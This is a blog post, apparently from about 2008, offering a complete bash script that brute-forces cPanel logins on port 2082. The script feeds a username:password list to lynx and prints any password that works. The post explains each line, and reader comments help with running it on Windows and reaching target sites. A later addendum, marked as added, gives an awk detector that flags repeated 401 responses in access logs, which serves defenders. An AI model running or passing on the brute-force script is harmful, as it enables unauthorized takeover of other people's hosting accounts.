
Hello. Have you ever tried to brute force a website login page and couldn't find the right tool?
It happens all the time, so I will explain how I did it with a Linux shell script.
I wrote a small script to brute force cPanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather than making other
# people's lives more difficult!
#############################
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|
#############################
echo ".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site
n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do
password=`sed -n "$i"p pass_list`
b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
echo trying password $password
if [ ! -z "$b" ]; then
echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================
Let's explain what we did:
- #!/usr/bin/env bash
- read site
- n=`cat pass_list | wc -l`
- for (( i=1; i <= $n; i++));
- password=`sed -n "$i"p pass_list`
For example, in loop number 4 the variable $i will have the value 4 and the sed command will look like this:
"sed -n 4p pass_list", which prints the 4th line of the password file pass_list.
- b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
We use the option "-dump" to dump the output instead of waiting for user action, "-nolist" to disable the link list feature in dumps, and "-auth=" to set the authorization ID and password for protected documents.
For example, accessing the cPanel account for the website "example.com" with username "user" and password "pass" looks like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"
So the password file pass_list should contain the usernames and passwords in this format: "username:password"
- if [ ! -z "$b" ]; then
That's all, folks :)
Dr.Death
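Seen from the server side, the loop described above shows up as a run of HTTP 401 responses from one client, sometimes ending in a 2xx. The following is an added example, not part of the original post, that flags that pattern in an access log. It assumes Combined Log Format (field 1 is the client IP, field 9 the status); the function names and sample lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): report clients that produce
# many HTTP 401 responses, and whether a 2xx response followed the failures.
# Assumption: Combined Log Format, so $1 = client IP and $9 = HTTP status.

detect_auth_bruteforce() {
  # $1 = number of 401s from one client before it is reported (default 5)
  awk -v threshold="${1:-5}" '
    $9 == 401 { fails[$1]++ }
    # A 2xx after the threshold was reached may be a successful guess.
    $9 ~ /^2[0-9][0-9]$/ && fails[$1] >= threshold { hit[$1] = 1 }
    END {
      for (ip in fails)
        if (fails[ip] >= threshold)
          printf "%s failures=%d success_after=%s\n",
                 ip, fails[ip], ((ip in hit) ? "yes" : "no")
    }
  ' | sort
}

# Constructed sample log lines (documentation IP ranges, not real traffic).
sample_log() {
  cat <<'EOF'
198.51.100.7 - admin [12/Mar/2008:10:00:01 +0000] "GET / HTTP/1.0" 401 401 "-" "Lynx/2.8.6rel.4"
198.51.100.7 - admin [12/Mar/2008:10:00:02 +0000] "GET / HTTP/1.0" 401 401 "-" "Lynx/2.8.6rel.4"
203.0.113.9 - alice [12/Mar/2008:10:00:02 +0000] "GET / HTTP/1.1" 401 401 "-" "Mozilla/5.0"
198.51.100.7 - admin [12/Mar/2008:10:00:03 +0000] "GET / HTTP/1.0" 401 401 "-" "Lynx/2.8.6rel.4"
203.0.113.9 - alice [12/Mar/2008:10:00:09 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - root [12/Mar/2008:10:00:10 +0000] "GET / HTTP/1.0" 401 401 "-" "Lynx/2.8.6rel.4"
198.51.100.7 - admin [12/Mar/2008:10:00:11 +0000] "GET / HTTP/1.0" 401 401 "-" "Lynx/2.8.6rel.4"
192.0.2.44 - root [12/Mar/2008:10:00:12 +0000] "GET / HTTP/1.0" 401 401 "-" "Lynx/2.8.6rel.4"
198.51.100.7 - admin [12/Mar/2008:10:00:13 +0000] "GET / HTTP/1.0" 200 5120 "-" "Lynx/2.8.6rel.4"
192.0.2.44 - root [12/Mar/2008:10:00:14 +0000] "GET / HTTP/1.0" 401 401 "-" "Lynx/2.8.6rel.4"
EOF
}

sample_log | detect_auth_bruteforce 3
```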
4 comments:
Is there any way to use it in Windows?! I don't know how, I mean the bash script!
Hello, yes, you can run it with Cygwin Unix under Windows.
I tried it, nice script, but for some reason lynx couldn't connect.
Hi, first try to connect to the target website using lynx to troubleshoot:
lynx "website.com"
lynx "website.com:2082"
Check, maybe the website doesn't run cPanel.